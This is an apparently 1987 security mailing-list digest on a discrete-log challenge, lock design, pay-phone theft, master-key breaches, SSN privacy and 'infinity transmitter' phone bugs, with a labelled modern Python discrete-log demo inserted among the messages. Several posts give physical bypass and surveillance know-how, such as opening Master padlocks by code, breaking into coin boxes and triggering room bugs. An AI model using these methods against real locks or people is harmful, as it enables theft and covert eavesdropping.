The system Sun is using is NOT, I repeat IS NOT, the same one that Evi broke. The system Evi broke is based upon the field GF(2^127). However, our system is based instead on the integers mod M, where M is a 128 bit prime number. In fact, in her paper, Evi even admits that logarithms in the field of integers mod M are intractable. I have given Evi a challenge, and so far I have heard nothing. Here is the challenge for anyone else who cares to give it a whirl:

P = (2^S) % M
P = 962493b2991f6639a5f249aec8fc64e3
M = b520985fb31fcaf75036701e37d8b857 (hex)

Find S.

-brad

From: Fred Blonder 26-Nov-1987 01:14:36
To: awalker@red.rutgers.edu
Subj: [1484] Re: mister pay phone

From: *Hobbit*
Pay phones generally use lever locks. These were invented ages ago, before the pin-tumbler . . .

How many ages ago? The pin tumbler lock was invented by (surprise) the ancient Egyptians. True, their keys were a bit large by modern standards (they were hung from the owner's belt), but the principle was exactly the same.

----
Fred Blonder (301) 454-7690
seismo!mimsy!fred Fred@Mimsy.umd.edu

[I stand somewhat corrected. However, the principle wasn't *exactly* the same -- the pins in the lock were only the top halves, and the pegs on the wooden key formed the lower halves when the key was pushed up into the slot. The security was based mostly on the *positioning* of the holes. Related to this, Larry then asks:]

From: Larry Hunter
Subject: Re: mister pay phone

A properly constructed [lever lock] is extremely difficult to defeat...

That's interesting! How come I use a pin-tumbler on my door at home? If these things are so good, how come they are not in wider use?

Larry

[Hell if I know. Perhaps they don't wear as well due to stronger springs, or get jammed more easily if left outside. This *is* an interesting question. I have no theories offhand -- anyone else? _H*]

From: marauder@tc.fluke.com (Bill Landsborough) 1-Dec-1987 13:14:45
To: uw-beaver!misc-security@beaver.cs.washington.edu
Subj: [1279] Re: Picking locks on pay phones

When I was a pay phone coin collector in the early sixties in Bakersfield CA there was a man/woman team that was hitting the Kern Co. area pretty hard and they made my work pretty hectic. The way they would do it was they would both go into the phone booth and the woman would hold a newspaper up like they were calling want ads. The man would pick the lock with very sophisticated tools and then "scrape" the bolt down to open the lock. Pacific Telephone invented a new C version lock that was "unpickable" but this guy was successful in picking at least one C version that I remember. I came into a bar one morning only to have missed him by less than 10 minutes. When I opened up the door for the coin box there was no coin box and there was no money lying in the bottom of the phone housing. I asked the bartender who was the last person to use the phone and he described the couple to me. Sometimes he got ~$120....sometimes $.30.
We never caught him while I was there, to 1964.

Bill Landsborough
-- "Answer a fool according to his folly, or he will be wise in his own eyes." Proverbs 26:4

From: mimsy!cvl!decuac!uccba!ncoast!smith@RUTGERS.EDU (Phil Smith) 2-Dec-1987 06:41:14
To: moss!cbosgd!misc-security@rutgers.EDU
Subj: [634] Re: mister pay phone

> It would seem more likely that this guy knocked
> over a coin collector and stole his key ring.

It would not do him a great deal of good to have stolen keys from a coin collector. The coin box locks are all keyed differently. True, you will eventually find duplicates, I would think, but not enough for the amount of phones he has supposedly hit.

--
decvax!mandrill!ncoast!smith
ncoast!smith@cwru.csnet
(ncoast!smith%cwru.csnet@csnet-relay.ARPA)

From: *Hobbit* 4-Dec-1987 05:35:47
To: security@RED.RUTGERS.EDU
Subj: [742] Best control wrench

Note that since the control shell is only .0125 inch thick at the bottom of the keyway where the holes are, and the proposed tool must exert *no* tension between the plug and the control shell, you have a difficult machining problem here. Do such tools actually exist, and do they work at all well given the relatively tight tolerances involved [which can probably vary from lock to lock within a certain amount]?? Obviously there will be one tool per keyway, but even something with an exact keyway fit and a short little pin on the bottom may still torque the normal shear line enough to confuse matters.

_H*

From: David Millman 4-Dec-1987 09:25:08
To: SECURITY@red.rutgers.edu
Subj: [1002] Lock Query

I inherited an "Abloy" lock on my front door. Was wondering if the lock theory experts on this list have had any experience or comments about this sort of lock. It's a bit conventional: metal-key-in-hole-in-cylinder. But the key and the hole have very little orientation (much less than Medeco) and, when turning the cylinder, there seems to be a very loose fit. Locksmiths in the area (Manhattan, lots of lock stores) don't know anything about it. And the original owner said you have to send proof of purchase to Scandinavia to key a duplicate key. Is this lock of any theoretical interest?

-----------------------------------------------------------------------------
David Millman                    arpa:   dsm@cunixc.columbia.edu
Sr. Analyst/Programmer           bitnet: dsmus@cuvma
Columbia U Computer Center       uucp:   ...rutgers!columbia!cunixc.columbia.edu!dsm

From: "Louis S. Graham" (GC-CDSI) 2-Dec-1987 11:52:53
To: security@RUTGERS.EDU
Subj: [690] All related computer crimes and outcome.

To all interested parties,

I have been assigned to give a computer security briefing on how essential computer security is here at this ARMY site. Any information anyone can provide me with in reference to computer crimes (what the outcome of the event was and, if possible, what kind of controls were put in place because of the incident), and whatever other material you may have relating to this subject, will be greatly appreciated.

Louis Graham, EDP Security Analyst

From: uunet!kitty!larry@RUTGERS.EDU (Larry Lippman) 3-Dec-1987 00:20:20
To: security@RUTGERS.EDU
Subj: [1856] Vehicle Locating Devices

> Does anyone know where to conveniently purchase some kind of device
> to place in a car to track where that car is going?

If you have a minimum of $10K to spend, you can do it "the right way"...

There is a company called Ocean Applied Research (O.A.R.) in San Diego which manufactures sophisticated radio direction finders and locating transmitters. The direction finders are available in various models which cover frequency ranges from LF (0.05 MHz) to UHF (520 MHz). These direction finders provide a polar oscillographic display of bearing and relative signal strength. These systems use stationary antennas of the Adcock type for fixed or marine installation, and of a low-profile ferrite loop type for vehicular or aircraft installation. The O.A.R.
direction finding equipment is fairly compact, and is suitable for permanent or temporary installation aboard ships, aircraft and vehicles.

O.A.R. direction finding equipment is extensively used for search and rescue operations, animal tracking for natural sciences research, location of unlawfully-operated radio transmitters, and for "other" purposes. O.A.R. is considered the "Cadillac" of non-milspec direction finding apparatus (you don't even want to _know_ the cost of equivalent military-grade apparatus).

O.A.R. does manufacture transmitters for tracking purposes, although most of their transmitters are intended for oceanographic studies.

<> Larry Lippman @ Recognition Research Corp., Clarence, New York
<> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry
<> VOICE: 716/688-1231 {hplabs|ihnp4|mtune|utzoo|uunet}!/
<> FAX: 716/741-9635 {G1,G2,G3 modes} "Have you hugged your cat today?"

From: 4-Dec-1987 07:25:08
To: security@ubvm
Subj: [1410] Computer security systems.

Frankly, this computer security issue is the biggest load of bilge I've ever heard. It seems so obvious that most computers should not be open, the whole issue is a waste of bandwidth. Banks have safes. Houses and cars have locks. I doubt that the proponents of "open-systems" leave their houses and cars unlocked. Our society suffers the inconvenience of security not because the society as a whole is bad, but rather because a select few are bad. And so we must all suffer the inconvenience. Those who think systems should be open must also believe that all people are good. Talk about a pipe dream.

History has proven that computer security is necessary. Those who choose to ignore this are either destined to repeat history, or should see the reality of things. I don't want to really get into politics here, but consider this example. Why do the Soviets and the U.S. have such an arms buildup? Why do we spend so much on security? Gracious, the Soviet secretary general has never even SEEN this country. The answer is simple. Because neither country can ASSUME the other won't try something. That would be reckless, and there is too much at stake. Computers (and any security for that matter) must work on the same principles. One cannot ASSUME safety. One must ensure it.

From: bzs@bu-cs.bu.edu (Barry Shein) 4-Dec-1987 14:52:25
To: psw@wolfgang.arpa
Subj: [569] master key security

One would think the decision to re-key or not would be settled by a conversation between the University's and their Insurance company's lawyers. Unless they don't mind leaving the campus in a situation where claims might be disallowed based on a lack of minimally acceptable security practices. Most universities self-insure up to a high deductible ($100K is not unusual) but something as global as this can easily threaten that deductible.

-B

From: gwyn@brl-smoke.arpa (Doug Gwyn) 4-Dec-1987 15:58:40
To: misc-security@uunet.uu.net
Subj: [2178] Re: Home Locksmith Courses

>might have an opinion (uh-oh! I'm asking for it) on the worth of the
>so called 'home locksmith' courses that one sees advertised in magazines.

The Belsaw locksmithing course is fairly good, and you end up with a key machine that is adequate for most routine key cutting. You also have the opportunity to purchase supplies, and as I recall you can start a subscription to the National Locksmith magazine, which gets you bonded. Most communities require practicing non-student locksmiths to be registered; some have started to require certification tests. It is a good idea to comply, since otherwise they might run you in for possession of "burglar tools". (This despite the fact that very few actual burglars use locksmithing tools, except possibly for automobile door opening tools.) Once you have your student locksmith card and National Locksmith subscription, it isn't too difficult to get locksmith supply companies to deal with you. You might consider investing in a supply of professional business cards, saying something like "Joseph M. Blow -- Security Consulting Services". When I was at Rice, a group of students set up a small firm "Richard E. Ingram Associates" and had letterheads printed, etc. It doesn't take very much to gain some degree of credibility in the business world.

You can also perhaps get a limited amount of equipment and supplies from a company like Curtis that supplies the corner 7-11 key shop. They're mostly good for key blanks and of course key machines. The "Curtis code clipper" was a handy little portable device for making keys by code; that and a Curtis Master padlock code book would get you into a lot of places (because people often don't erase the code number printed on the face of Master padlocks). I even had a favorable Dun & Bradstreet rating for a while as a result of dealing with Curtis.

If you're going to get into the locksmith business, please make sure you develop a good sense of professional ethics, not using your skills to trespass or cause damage or loss to others.

From: decvax!felix!chuck@ucbvax.berkeley.edu (Chuck Vertrees) 4-Dec-1987 20:42:41
To:
Subj: [862] Re: master key security

>What will the administration do if they find such a lock has
>been removed by brute force?

I once worked at a high school and they had just this problem. Someone had compromised the master and they were faced with finding a solution. This particular school was constructed in a campus type arrangement with ten buildings, each with eight exterior doors. Keying was in a master/submaster/individual scheme, layered as appropriate. The school system had their own internal locksmith department, doing all the keying themselves. Budgets being what they are, they took the cheap way out. They designated two exterior doors in each building to be re-keyed and plugged all the others with epoxy.

Chuck V.
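[Editor's added example, not part of any message in this digest. Brad Taylor's challenge earlier in this digest asks the list to find S given P = 2^S mod M. The Python below (assumed Python 3.8 or later, for the negative-exponent pow) spells out the asymmetry his challenge rests on: producing P from S is one modular exponentiation, while recovering S is a discrete logarithm. The hex constants P and M are copied from his message; the toy 31-bit prime, generator and exponents used for the Diffie-Hellman exchange and the baby-step giant-step solver are constructed for the demonstration, chosen small enough that the sqrt(p)-sized table is practical. Nothing here attempts the 128-bit challenge itself.]

```python
"""Diffie-Hellman over the integers mod a prime, and what "find S" costs.

Editor's added example for the security digest; not Sun's code and not Brad
Taylor's. P and M below are the values quoted in his challenge; everything
else is constructed for illustration.
"""
import math
import random

# Challenge values copied verbatim (hex) from Brad Taylor's message.
CHALLENGE_P = int("962493b2991f6639a5f249aec8fc64e3", 16)
CHALLENGE_M = int("b520985fb31fcaf75036701e37d8b857", 16)


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Textbook Miller-Rabin test with a fixed-seed RNG so runs are reproducible."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:  # write n-1 = d * 2^r with d odd
        d //= 2
        r += 1
    rng = random.Random(0)
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True


def challenge_sanity() -> dict:
    """What the challenge statement lets a reader verify cheaply: the modulus is
    128 bits and (per Brad) prime, and P is a proper residue mod M."""
    return {
        "M_bits": CHALLENGE_M.bit_length(),
        "M_probable_prime": is_probable_prime(CHALLENGE_M),
        "P_in_range": 0 < CHALLENGE_P < CHALLENGE_M,
    }


def dh_exchange(p: int, g: int, a: int, b: int) -> tuple:
    """Textbook Diffie-Hellman: each side publishes g^x mod p and both derive
    g^(ab) mod p. Returns (A, B, shared_key). Cheap in both directions."""
    A = pow(g, a, p)          # Alice's public value
    B = pow(g, b, p)          # Bob's public value
    k_alice = pow(B, a, p)
    k_bob = pow(A, b, p)
    assert k_alice == k_bob   # the exchange is consistent by construction
    return A, B, k_alice


def bsgs_dlog(g: int, h: int, p: int):
    """Baby-step giant-step: return s with g^s = h (mod p), or None.

    Generic method: about sqrt(p) multiplications and a table of sqrt(p) entries.
    Fine for a toy 31-bit prime; for a 128-bit modulus that is ~2^64 steps,
    which is the whole reason the modulus is chosen that large."""
    m = math.isqrt(p - 1) + 1
    table = {}
    e = 1
    for j in range(m):            # baby steps: g^j -> j
        table.setdefault(e, j)
        e = e * g % p
    factor = pow(g, -m, p)        # g^(-m) mod p (Python 3.8+)
    gamma = h
    for i in range(m):            # giant steps: h * g^(-im)
        if gamma in table:
            return i * m + table[gamma]
        gamma = gamma * factor % p
    return None


if __name__ == "__main__":
    print("challenge:", challenge_sanity())
    p, g = 2147483647, 7          # constructed toy parameters (2^31 - 1 is prime)
    A, B, k = dh_exchange(p, g, 111, 222)
    s = 123456789
    h = pow(g, s, p)
    print("recovered exponent:", bsgs_dlog(g, h, p))
```

On the toy prime the solver needs roughly 46,000 baby steps and as many table entries; for a 128-bit modulus the same generic method needs about 2^64 of each. Generic algorithms such as this one are bounded by the square root of the group order, and whether field-specific methods can do better for a particular field is exactly the question Brad's challenge puts to the list.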
From: csi!csib!lgold@spam.istc.sri.com (Lynn Gold) 4-Dec-1987 16:30:58
To: psw@wolfgang.arpa (Phil Wherry)
Subj: [658] Re: master key security

>I can say from more-or
>less first-hand experience that a college administration's reaction is to
>merely shrug their shoulders and cross their fingers in the wake of a fairly
>major breach of master key security.

Columbia University was the same way. There were two or three sets of master keys MISSING, yet they did not want to re-key the locks. I guess they figure that the amount in labor (union wages) isn't worth paying when everything the school cares about is insured anyway....

--Lynn

From: Mike Linnig 4-Dec-1987 14:18:54
To: security@RED.RUTGERS.EDU
Subj: [1928] RE: Re: Picking locks on pay phones

I worked as a telco lineman one fall (an engineering co-op job). As part of that work we had to go around and extract the cash boxes from the payphones. They gave us a large ring of keys (not a master key). Incidentally, we never really touched the coins, they fall into a coin box that gets replaced when we open up the phone.

As for the phones being alarmed, I really don't believe it. Except for high crime areas maybe. On one occasion we had a phone that would not open at all. The key mechanism was jammed (it came from a high school -- I wonder who jammed it?). I got to try and break into the phone -- fun fun. We tried drilling out the lock. We trashed a drill bit or two doing it but we managed to get a nice hole through the lock cylinder. Well, that was fun, but it got us nowhere. It still wouldn't open. We decided to take the phone off of the wall. The mounting bracket was designed so that you only had access to the mounting screws if the phone was unlocked. I really don't remember how we did it, but we got it off of the wall (probably by brute force -- I had a BIG partner). By the way, no alarms went off. No police arrived on the scene. Remember this was in a high school -- If they alarmed phones in general, I wouldn't expect them to have the high school phone disabled.

Anyway, we managed to get the damn thing open by lots of prying with large screwdrivers (used as crowbars) and some hammering. The phone was totally worthless -- but we got the money back to the telco (the phone had to be replaced anyway, can't leave them until they fill up with coins). This was a small telco in southern Indiana, Bell systems and GTE may do things differently.

Mike

ps. Don't do this with your phones, someone MAY get annoyed (grin)

From: uunet!kitty!larry@RUTGERS.EDU (Larry Lippman) 5-Dec-1987 09:37:44
To: security@RUTGERS.EDU
Subj: [3628] Submission for misc.security (Coin telephone security)

> He told me that they were alarmed, and that if you open
> one even with a key at the wrong time, telco will phone the police.

If this is true, it only applies to newer electronic coin telephones, and NOT the traditional single-slot coin telephones such as the WECO free standing types (1A, 1C series) or the WECO "panel-mounting" types (2A, 2C series).

The only thing close to an "alarm" is that some coin telephones had a coin "bank" [the proper term] with an electrical contact on the top. When the bank gets full of coins, a ground is effectively placed on this contact. This ground is placed in series with a resistor which places a high resistance ground to one side of the telephone line. This condition can be periodically scanned by automatic equipment in the central office to ascertain if a coin telephone bank is full. Actually, I have only seen this done on some early multi-slot coin telephones during the 1960's, and I don't believe this feature was even provided on single-slot coin telephones.

Coin telephone repairpersons usually have no keys for access to the coin bank portion of a coin telephone. There is actually no need for them to have access, since all repairs can be made with the upper housing opened. Opening the upper housing gives no access to the coin bank; you would need something like string and chewing gum :-) to extract any coins from the bank. Restricting coin bank keys to coin collection (and not repair) personnel gives telephone companies a better sense of security.

Coin banks have a sliding cover with an interesting lever mechanism; the coin banks are intended to be provided with a wire seal. With the seal intact, the bank can be inserted and removed from a coin telephone ONLY ONCE. There is no way to remove a full coin bank and open the cover to get access to the coins without breaking this seal.

Quite frankly, telephone company security personnel seem more paranoid about employee theft from coin telephones than from theft committed by the general public. Occasionally, a malfunctioning coin collection mechanism will cause a few coins to spill into the upper housing where a repairperson might have access to them. The proper procedure is to take the coins, place them in a special envelope, label it and seal it right away; the envelope is to be turned in to supervisory personnel as soon as possible. Some BOC security personnel seem to have nothing better to do than plant "marked" coins in the upper housing of a coin telephone, and try to bait some repairperson into not properly turning in the money.

I also find amusing the following introductory paragraph as quoted from a BOC coin telephone service manual: "Social changes during the 1960s made the multi-slot coin station a prime target for: vandalism, strong arm robbery, fraud and theft of service. This brought about the introduction of the single slot coin station and a new environment for coin service." Social changes?! :-)

My knowledge of coin telephones ended with the single-slot series mentioned above. I have almost no idea what happens inside the new-fangled coin telephones with CRT's and credit-card readers.

<> Larry Lippman @ Recognition Research Corp., Clarence, New York
<> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry
<> VOICE: 716/688-1231 {hplabs|ihnp4|mtune|utzoo|uunet}!/
<> FAX: 716/741-9635 {G1,G2,G3 modes} "Have you hugged your cat today?"

From: Bob Kusumoto 4-Dec-1987 21:19:09
To: security@rutgers.edu
Subj: [1096] Re: Picking locks on pay phones

I don't know about these new phones that companies other than Ma Bell are putting out, but the old standard pay phones are not alarmed. They have 8 tumbler locks on them so it is VERY difficult to pick these open. I have heard stories about people hooking up a van to a pay phone to pull it out and the axle was ripped out from the van. Another story from the north (Canada) was to pour water into the coin slot, let it freeze over then hit the phone so it splits open. The reason why the phone company switched to these more secure pay phones was that people were breaking into the older models and they needed to collect more money (by the way, the phone company spends approx. $1800 per pay phone plus any other extras they want to add like a light or special set-up for it). Hope this information helps.

Bob Kusumoto
Internet: kus3@sphinx.uchicago.edu
BITNET: kus3@sphinx.uchicago.bitnet
UUCP: ...{!inhp4!gargoyle,!oddjob}!sphinx!kus3

From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) 5-Dec-1987 13:17:47
To: seismo!misc-security@seismo.css.gov
Subj: [483] Re: virus alert

A word of note: working part time as a reservationist for an airline, I came across a call from a frantic person who was trying to trace a lost bag. I asked him the contents and he explained about the virus... he told me it was to be used in some systems going overseas... it could be some college student got hold of this....

From: quintus!gregg@Sun.COM (W.
Gregg Stefancik) 5-Dec-1987 21:22:16 To: security@red.rutgers.edu Subj: [2152] Locksmithing School directory and commentary A list of locksmithing schools appeared in this months National Locksmith. For those of you who can't obtain a copy I have retyped the list below: Acme School Locksmithing Divison 11350 S. Harlem Worth, IL 60482 312 361 3750 Foley Belsaw Institute 6301 Equitable Rd. Kansas City, MO 64120 800 328 7140 California Institute of Locksmithing 14721 Oxnard St. Van Nuys, Ca 91411 818 994 7426 HPC Learning Center PO Box 2093 Schiller Park, IL 60176 312 671 6445 Locksmithing Institute 1500 Cardinal Drive Little Falls, NJ 07424 201 256 4512 NRI Schools 3939 Wisconsin Ave. Washington, DC 20016 202 244 1600 NY School of Locksmithing 152 W. 42nd St. New York, NY 10036 Security Education Plus PO Box 497 Nicholasville, KY 40356 606 887 6027 Universal School of Master Locksmithing 3201 Fulton Ave. Sacramento, CA 95821 916 482 4216 I have had some experience with two of the above schools. I graduated from the Foley Belsaw Institute course which does a reasonable job of covering the basics, but the course is a bit dated. You will not learn about interchangeable cores, opening modern cars, or pushbutton locks. Foley Belsaw does provide you with the connections to obtain proper bonding and subscriptions to the two popular trade magazines (National Locksmith and Locksmith Ledger). Foley Belsaw will also provide you with locksmithing supplies at a reasonable cost, but once you make connections via the trade publications the sky is the limit. It is a wonderful way to increase your locksmithing knowledge and be right with the law at the same time. They also provide you with an extremely useful key machine which can copy keys and cut them by code w/o depth keys. I sent away for the NRI course information and found that while the course was a little better packaged than the Foley Belsaw course it cost roughly 3 times as much! 
I would not recommend the NRI course unless you have big bucks to burn. Gregg Stefancik Foley Belsaw Certified Locksmith quintus!gregg From: brock@pnet01.cts.com (Brock Meeks) 6-Dec-1987 11:09:01 To: crash!security@rutgers.arpa@bass.nosc.mil Subj: [849] Re: Picking locks on pay phones Steve, I have happened to get a copy of that article you read in the Blade re: the guy with the special tools. I asked at NATA, of the Medeco folks, if they had heard of our San Diego coin bandit, they had, he is the *same* guy as in the blade; an industry legend. Seems the security folks have tracked him across the nation. He used to be a machinist. He's never hit a Medeco lock, only "old telco" boxes (whatever those are). As for the 20 minute time frame? Forget it. The guys I talked to said, "He's just about as fast as a guy with a key." The favorite story: the time he cracked a box right before jumping on an airline, in broad daylight, waiting to board a plane. From: brock@pnet01.cts.com (Brock Meeks) 6-Dec-1987 11:09:30 To: crash!security@rutgers.arpa@bass.nosc.mil Subj: [1581] Re: Picking locks on pay phones > He told me that they were alarmed, and that if yo upoen one, even with a > key at the wrong time, telco will phone the police. This is wrong, according the pay phone specialits I interviewed for an article I wrote. I was just at the North American Telecomm. Association show in Dallas, and they had a big payphone pavillion there. The only way these guys know a phone has been hit is when they come to empty it. I spoke with the folks at Medeco (they had a big display of their "virtually pick proof lock) and they verified the problem with pay phone locks. You see, it seems that with the influx of private pay phones, these guys were starting to toss "crap on the market" (crap being locks) and they cared more about profits than good security (a topic of conversation that only recently began getting any kind of hearing in the pay phone industry). 
BUT...cracking the lock box is not the BIG DEAL. The *real* story is that guys are ripping off the expensive COMPUTER BOARDS and electronics in the upper half of the phones. These boards run some $300 or $400 apiece and according to one security analyst, "There's a huge black market for these boards." Interestingly enough, the locks protecting the electronics are far easier to pick than the coin box lock. "These guys are more worried about protecting $20-$50 in coins rather than $300-$400 in electronics," the rep from Medeco said. You figure it.

From: jb7m@andrew.cmu.edu (Jon C. R. Bennett) 6-Dec-1987 15:42:28
To: security@RUTGERS.EDU
Subj: [2223] Re: Computer Security Systems

>I suspect that vandalism would still be rare (my basic optimism in humanity)
>but when it did occur it would be drastic

I tend to agree with that statement. It seems to me that the basic problem is that you are going to let all these people loose on the system and then for fun one of them is going to delete the system. However, you are forgetting one thing: in such a system, if you kept track of deletions and zero-length overwrites and the like, you could take real-world action against such people, i.e. you can do what you want but if we catch you the results are going to be messy. Another solution is to have a large elite, i.e. the number of people who would have total access would be larger than it is now and people would get to such a position simply by being trustable in the eyes of the current users.

I don't know if any of you know of MIT's ITS (Incompatible Timesharing System), in which the users had free roam. When you login to ITS it tells you how many users there are on the system, USERS: 5, but someone changed it to say LOSERS: 5. It was changed back and forth a few times and finally settled on LUSERS: 5, something that was acceptable to all.
Another complaint is that someone will eat up all of the CPU or disk space, but what you don't see is that if everyone is equal then if there are 5 people on the system and everyone is using CPU-munching programs then the CPU time will be split 5 ways, and if someone does not need all of theirs it will be split among the rest. As far as disk space, split it evenly among the users and if someone needs more they can have it by general consensus.

My basic point is that the users are responsible to someone; they are responsible to the group and if that is not enough then they should not be admitted to the group. It may appear that I am contradicting myself by saying there should be a group, but I bow to reality in that there will always be people that can not be trusted, but if they are allowed to use the system then it should be as equals, not as subordinates.

Jon Bennet
jb7m@andrew.cmu.edu

From: *Hobbit* 8-Jan-1988 16:24:29
To: Security: ;
Subj: [7340] Security msgs re: SS numbers

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: matt@oddjob.uchicago.edu (Schizophrenic Solipsist)
Subject: Re: SSN
Date: 10 Dec 87 05:15:58 GMT

Could some kind soul mail me a pointer to the relevant laws that allow me to try to keep my SSN private? Hardly a month goes by that some sales person or public-service droid doesn't insist that their company requires my SSN in order to do business, extend credit, or answer a question.

________________________________________________________
Matt Crawford
University of Chicago
matt@oddjob.uchicago.edu
{astrovax,ihnp4}!oddjob!matt

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Wed, 9 Dec 87 17:35:07 PST
From: gea@Romeo.Caltech.Edu (Gary Ansok)
Subject: SSN's

In a recent message, Larry Hunter described some quite awful things happening to a person because a police department got his name by mistake, and used that as an argument against giving out your SSN.
Are such mixups more likely, or less likely, if police departments use SSN's as a key rather than personal names (or whatever would be used instead if we all refused to give out our SSN)? If someone wants to impersonate someone, they are as likely (or more) to do it on the basis of a name as a social security number; you also have the possibility of duplicate names (yes, these have also caused problems without any misrepresentation by any party involved).

The problem is not the identifying key used; one problem is the non-robustness of data (if the tattoo in Larry's example had been included in the warrant and checked by the officers, this might not have arisen). Any method of keeping data requires a unique key for a person. One hopes that in the case of critical data, there will be some secondary data which, even if not unique, will verify that the primary key is valid.

What really worried me about Larry's story was the fact that a birth certificate (which has no picture and only minimal physical description) is often regarded as the ultimate ID in our society.

Gary Ansok
ansok@scivax.stsci.edu or gea@romeo.caltech.edu

P.S. On a different topic, I salute my credit union: My primary account number, which is the only one to appear on my checking and Visa statements, does not appear on either my checks nor my Visa card. I have often wondered how secure banks are with all the numbers written on checks &c.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun, 13 Dec 87 14:57:08 EST
From: Larry Hunter
Subject: Re: SSN

Jonathan, I apologize for calling your characterization a bit naive. Let's look at where we might agree. First, in my original posting I concluded my nasty scenario with the following caveat:

    Paranoid? Sure. I don't think this sort of thing happens very often, but it provides an idea of the power in those 9 digits.
I personally believe that the institutional (mis)use of SSNs is by far a worse problem than the kind of criminal behavior I just described, but I find the latter is more persuasive to people who are cavalier about having "nothing to hide". You made this point more strongly:

    ... Injustice has happened before there were computers and widespread usage of SSN's. I am sure that we will still have to continue fighting these cases as long as there is civilization. However the possibility of the kind of hassle mentioned in the article to which I replied is probably less than that of being hit by a car, robbed at gunpoint, or harassed in a more "traditional" manner.

Your point is well taken. SSN based abuse is not all that likely. On the other hand, it is sobering to realize how important records about us are to our well being. People can indeed suffer significant harms because of records about them.

    It is rather pointless to end up with high blood pressure, heart disease, depression, and lost productivity because you spend half of your life fighting the phone companies or someone else's usage of your SSN or any other number.

This I have a harder time with. Although I try not to get too stressed out over it, I think there are real problems arising from institutional abuse of SSNs. My concerns (and my reasons for holding my SSN closely) are as I stated originally:

    The practical reasons to associate your SSN with as few records about you as possible have to do with the fact that large, powerful entities (like the IRS and large consumer products companies) use techniques like block modelling and record matching to exert significant power over individuals.

Do not underestimate the hidden uses of SSNs. They are more important, although sometimes less publicly compelling than the criminal ones. Consider some of the decisions that information associated with SSNs affects:

* Whether or not you get audited by the IRS.
* How much your health, life and property insurance cost, and whether or not it is available to you at all.

* Whether you are granted credit to buy a house, or a car, or get a credit card (the latter is used as an important distinguishing factor between "haves" and "have nots" in our society).

* Your access to government assistance (from farm loans to student aid to aid to families with dependent children).

* Who becomes the target of law enforcement investigations. Computer matching of records is a rapidly growing source of prosecutions that strikes me as utterly without probable cause. Also, don't forget that the Church Committee investigation of the US intelligence community in the late 70's said that the ability of the government to track and monitor individuals, if turned to repressive ends, would be sufficient to squash all dissent. Much of that ability derives from computer record keeping based on unique personal identifiers.

* How large corporations sell their goods to consumers. Information associated with you (perhaps associated with SSNs, although it has not been demonstrated) is used to target specific advertising that has been shown to be effective on people "like" you. Different (possibly contradictory) advertising may be shown to others.

* How politicians influence you to vote. Although (like advertisers for consumer goods) use of SSNs has yet to be documented, politicians use techniques based on personal information similar to that of other advertisers to influence your political opinion.

Not all of these possible uses (and abuses) of SSNs are commonplace, but many of them are. Part of our role as members of this community is to try to foresee threats to our privacy and security and inform others about them. I believe that, although such threats may pale in comparison to physical violence, they are significant and worthy of discussion.
The Privacy Act of 1974, which limited uses of SSNs, held that unique personal identifiers in wide use were an important threat to individual rights. I agree with that sentiment, and would suggest that threat is more significant now than ever before.

Larry Hunter

From: *Hobbit* 8-Jan-1988 16:27:14
To: Security: ;
Subj: [4221] Security msgs re: infinity transmitters

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Wed, 25 Nov 87 13:09:33 EST
From: Dave Kucharczyk
Subject: Re: Infinity

Yes, infinity transmitters do exist. They work on the principle that the audio path is made even before a dialed phone starts to ring. One sends a tone down the line which tells the infinity transmitter to "pick up" the phone before the ringing starts, and can then listen to the location where the bug is planted. However, these devices are pretty much made obsolete by the fact that any of the ESS switches do not open an audio path until they receive answer supervision from the dialed end.

ssr

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Thu, 26 Nov 87 11:51:35 EST
From: Larry Hunter
Subject: Re: Infinity

    Ever heard of an "Infinity Transmitter"?

Yeah, they are pretty old tech bugging devices. They used to work fine, but with the advent of separate signalling and voice circuits in ESS (the electronic version of Ma Bell's switching system) they became obsolete. The idea was that the bug would listen to the phone line for a tone. When it heard the tone (or combination of tones -- they were called harmonica bugs because people often used harmonica notes to trigger them) it would pick up the phone and you could listen to what was going on in the room that the phone was in, before the phone rang. The problem in ESS is that the caller is not connected to the line when it is ringing -- the audio connection is only made when the phone is picked up -- so the bug cannot hear the incoming tone. No audio path to transmit the tone, no infinity bugs.
One might imagine more sophisticated versions of the infinity bug; it could pick up the line WHENEVER it rings, check for the tone, do the infinity bug thing if the tone is present, and if the tone weren't present it would have to generate its own ringing voltage (for the phone) and ringing tone (for the caller) until the line really got picked up. As you might imagine, the ESS infinity bug would have to be much more complicated (read more expensive and more likely to be detected) than the old style ones. I've never heard of anyone trying this.

There are lots of telephone exchanges that are not ESS (step and crossbar are the two main alternatives) where the simple old infinity bugs still work fine. Any exchange where "Custom Calling" (e.g. call forwarding or call waiting) is not available is probably not ESS.

People still sell things like infinity bugs as "home baby sitters" or as burglar alarms, but they answer the phone all the time even though they only turn the mike on if they receive a tone. These are useless as bugs because no one can make calls TO the target -- the bug always answers the phone.

You can rest easy re: infinity bugs, although you should be aware that it is a pretty trivial task to use electronic surveillance these days and that a lot of people do it.

Larry

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun, 29 Nov 87 16:27:38 EST
From: Mark W. Eichin
Subject: Infinity Transmitters

I saw an article on these once (on a bboard that got closed down about a year later for phone credit card postings). The main idea was that someone who wanted to tap the room would add this little circuit board to the phone, which would detect some sort of tone on the line when the phone first rang, inhibit the ring, and open the microphone. Something was mentioned about ultrasound (unlikely, given the quality of the phone lines, but it was being vague), and how you could tap in from anywhere as long as you could dial direct (i.e. even from England).
The main flaw was that the phone was of course busy (to the outside world) the whole time you were monitoring. It was allegedly used extensively by PI's to gather ``evidence'' for divorce proceedings. The article did not have much in the way of technical detail; oh well.

